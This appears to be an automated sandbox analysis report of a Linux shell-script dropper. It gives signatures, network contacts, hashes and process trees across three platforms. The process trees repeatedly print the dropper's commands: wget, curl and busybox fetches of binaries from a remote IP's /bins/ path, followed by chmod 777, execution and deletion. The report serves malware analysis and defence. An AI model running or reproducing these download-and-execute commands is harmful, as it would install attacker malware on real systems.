Analysis Overview
SHA256
fbca926a194f3a16d4f651f15e8348a9b3c95ba55cba7c8c59266451178da939
Threat Level: Shows suspicious behavior
The file fbca926a194f3a16d4f651f15e8348a9b3c95ba55cba7c8c59266451178da939.sh was found to be: Shows suspicious behavior.
Malicious Activity Summary
File and Directory Permissions Modification
Executes dropped EXE
Checks CPU configuration
Writes file to tmp directory
Reads runtime system information
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-20 03:52
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-20 03:52
Reported
2024-11-20 03:54
Platform
ubuntu1804-amd64-20240729-en
Max time kernel
31s
Max time network
129s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J | /tmp/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J | N/A |
| N/A | /tmp/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d | /tmp/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d | N/A |
| N/A | /tmp/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ | /tmp/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ | N/A |
| N/A | /tmp/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0 | /tmp/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0 | N/A |
| N/A | /tmp/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ | /tmp/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ | N/A |
| N/A | /tmp/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g | /tmp/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g | N/A |
| N/A | /tmp/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto | /tmp/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto | N/A |
| N/A | /tmp/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC | /tmp/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC | N/A |
| N/A | /tmp/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev | /tmp/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev | N/A |
| N/A | /tmp/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD | /tmp/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD | N/A |
| N/A | /tmp/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1 | /tmp/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1 | N/A |
| N/A | /tmp/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL | /tmp/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL | N/A |
| N/A | /tmp/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz | /tmp/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz | N/A |
| N/A | /tmp/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0 | /tmp/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0 | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d | /usr/bin/curl | N/A |
| File opened for modification | /tmp/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev | /usr/bin/curl | N/A |
| File opened for modification | /tmp/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD | /usr/bin/curl | N/A |
| File opened for modification | /tmp/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto | /usr/bin/curl | N/A |
| File opened for modification | /tmp/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL | /usr/bin/curl | N/A |
| File opened for modification | /tmp/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz | /usr/bin/curl | N/A |
| File opened for modification | /tmp/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC | /usr/bin/curl | N/A |
| File opened for modification | /tmp/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0 | /usr/bin/curl | N/A |
Processes
/tmp/fbca926a194f3a16d4f651f15e8348a9b3c95ba55cba7c8c59266451178da939.sh
[/tmp/fbca926a194f3a16d4f651f15e8348a9b3c95ba55cba7c8c59266451178da939.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://216.126.231.240/bins/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J]
/bin/chmod
[chmod 777 GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J]
/tmp/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J
[./GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J]
/bin/rm
[rm GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J]
/usr/bin/wget
[wget http://216.126.231.240/bins/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d]
/bin/chmod
[chmod 777 ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d]
/tmp/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d
[./ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d]
/bin/rm
[rm ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d]
/usr/bin/wget
[wget http://216.126.231.240/bins/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ]
/bin/chmod
[chmod 777 1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ]
/tmp/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ
[./1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ]
/bin/rm
[rm 1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ]
/usr/bin/wget
[wget http://216.126.231.240/bins/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0]
/bin/chmod
[chmod 777 i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0]
/tmp/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0
[./i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0]
/bin/rm
[rm i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0]
/usr/bin/wget
[wget http://216.126.231.240/bins/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ]
/bin/chmod
[chmod 777 IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ]
/tmp/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ
[./IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ]
/bin/rm
[rm IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ]
/usr/bin/wget
[wget http://216.126.231.240/bins/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g]
/bin/chmod
[chmod 777 LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g]
/tmp/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g
[./LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g]
/bin/rm
[rm LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g]
/usr/bin/wget
[wget http://216.126.231.240/bins/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto]
/bin/chmod
[chmod 777 KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto]
/tmp/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto
[./KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto]
/bin/rm
[rm KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto]
/usr/bin/wget
[wget http://216.126.231.240/bins/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC]
/bin/chmod
[chmod 777 mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC]
/tmp/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC
[./mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC]
/bin/rm
[rm mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC]
/usr/bin/wget
[wget http://216.126.231.240/bins/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev]
/bin/chmod
[chmod 777 yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev]
/tmp/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev
[./yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev]
/bin/rm
[rm yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev]
/usr/bin/wget
[wget http://216.126.231.240/bins/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD]
/bin/chmod
[chmod 777 SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD]
/tmp/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD
[./SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD]
/bin/rm
[rm SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD]
/usr/bin/wget
[wget http://216.126.231.240/bins/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1]
/bin/chmod
[chmod 777 YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1]
/tmp/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1
[./YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1]
/bin/rm
[rm YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1]
/usr/bin/wget
[wget http://216.126.231.240/bins/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL]
/bin/chmod
[chmod 777 IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL]
/tmp/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL
[./IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL]
/bin/rm
[rm IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL]
/usr/bin/wget
[wget http://216.126.231.240/bins/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz]
/bin/chmod
[chmod 777 pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz]
/tmp/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz
[./pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz]
/bin/rm
[rm pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz]
/usr/bin/wget
[wget http://216.126.231.240/bins/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0]
/bin/chmod
[chmod 777 O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0]
/tmp/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0
[./O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0]
/bin/rm
[rm O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0]
Network
| Country | Destination | Domain | Proto |
| US | 151.101.1.91:443 | | tcp |
| GB | 185.125.188.62:443 | | tcp |
| US | 1.1.1.1:53 | ocp-ingress.fastly.gnome.org | udp |
| US | 151.101.1.91:443 | ocp-ingress.fastly.gnome.org | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| N/A | 224.0.0.251:5353 | | udp |
| GB | 84.17.50.8:443 | | tcp |
Files
/tmp/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-20 03:52
Reported
2024-11-20 03:54
Platform
debian9-armhf-20240611-en
Max time kernel
47s
Max time network
51s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J | /tmp/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J | N/A |
| N/A | /tmp/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d | /tmp/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d | N/A |
| N/A | /tmp/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ | /tmp/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ | N/A |
| N/A | /tmp/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0 | /tmp/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0 | N/A |
| N/A | /tmp/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ | /tmp/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ | N/A |
| N/A | /tmp/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g | /tmp/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g | N/A |
| N/A | /tmp/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto | /tmp/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto | N/A |
| N/A | /tmp/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC | /tmp/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC | N/A |
| N/A | /tmp/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev | /tmp/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev | N/A |
| N/A | /tmp/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD | /tmp/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD | N/A |
| N/A | /tmp/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1 | /tmp/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1 | N/A |
| N/A | /tmp/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL | /tmp/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL | N/A |
| N/A | /tmp/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz | /tmp/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz | N/A |
| N/A | /tmp/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0 | /tmp/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0 | N/A |
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev | /usr/bin/curl | N/A |
| File opened for modification | /tmp/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz | /usr/bin/curl | N/A |
| File opened for modification | /tmp/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d | /usr/bin/curl | N/A |
| File opened for modification | /tmp/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC | /usr/bin/curl | N/A |
| File opened for modification | /tmp/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL | /usr/bin/curl | N/A |
| File opened for modification | /tmp/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J | /usr/bin/curl | N/A |
| File opened for modification | /tmp/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g | /usr/bin/curl | N/A |
| File opened for modification | /tmp/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD | /usr/bin/curl | N/A |
Processes
/tmp/fbca926a194f3a16d4f651f15e8348a9b3c95ba55cba7c8c59266451178da939.sh
[/tmp/fbca926a194f3a16d4f651f15e8348a9b3c95ba55cba7c8c59266451178da939.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://216.126.231.240/bins/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J]
/bin/chmod
[chmod 777 GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J]
/tmp/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J
[./GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J]
/bin/rm
[rm GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J]
Network
| Country | Destination | Domain | Proto |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
Files
/tmp/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
memory/796-1-0xb66a8000-0xb66b9044-memory.dmp
memory/796-2-0xb677b000-0xb678c044-memory.dmp
memory/854-3-0xb6743000-0xb6754044-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-11-20 03:52
Reported
2024-11-20 03:54
Platform
debian9-mipsbe-20240418-en
Max time kernel
93s
Max time network
95s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J | /tmp/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J | N/A |
| N/A | /tmp/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d | /tmp/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d | N/A |
| N/A | /tmp/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ | /tmp/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ | N/A |
| N/A | /tmp/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0 | /tmp/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0 | N/A |
| N/A | /tmp/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ | /tmp/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ | N/A |
| N/A | /tmp/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g | /tmp/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g | N/A |
| N/A | /tmp/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto | /tmp/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto | N/A |
| N/A | /tmp/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC | /tmp/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC | N/A |
| N/A | /tmp/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev | /tmp/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev | N/A |
| N/A | /tmp/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD | /tmp/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD | N/A |
| N/A | /tmp/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1 | /tmp/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1 | N/A |
| N/A | /tmp/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL | /tmp/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL | N/A |
| N/A | /tmp/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz | /tmp/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz | N/A |
| N/A | /tmp/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0 | /tmp/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0 | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J | /usr/bin/curl | N/A |
| File opened for modification | /tmp/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz | /usr/bin/curl | N/A |
| File opened for modification | /tmp/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto | /usr/bin/curl | N/A |
| File opened for modification | /tmp/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC | /usr/bin/curl | N/A |
| File opened for modification | /tmp/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL | /usr/bin/curl | N/A |
| File opened for modification | /tmp/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD | /usr/bin/curl | N/A |
| File opened for modification | /tmp/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g | /usr/bin/curl | N/A |
| File opened for modification | /tmp/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d | /usr/bin/curl | N/A |
| File opened for modification | /tmp/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1 | /usr/bin/curl | N/A |
Processes
/tmp/fbca926a194f3a16d4f651f15e8348a9b3c95ba55cba7c8c59266451178da939.sh
[/tmp/fbca926a194f3a16d4f651f15e8348a9b3c95ba55cba7c8c59266451178da939.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://216.126.231.240/bins/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J]
/bin/chmod
[chmod 777 GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J]
/tmp/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J
[./GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J]
/bin/rm
[rm GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J]
/usr/bin/wget
[wget http://216.126.231.240/bins/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ]
/bin/chmod
[chmod 777 IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ]
/tmp/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ
[./IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ]
/bin/rm
[rm IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ]
/usr/bin/wget
[wget http://216.126.231.240/bins/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g]
/bin/chmod
[chmod 777 LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g]
/tmp/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g
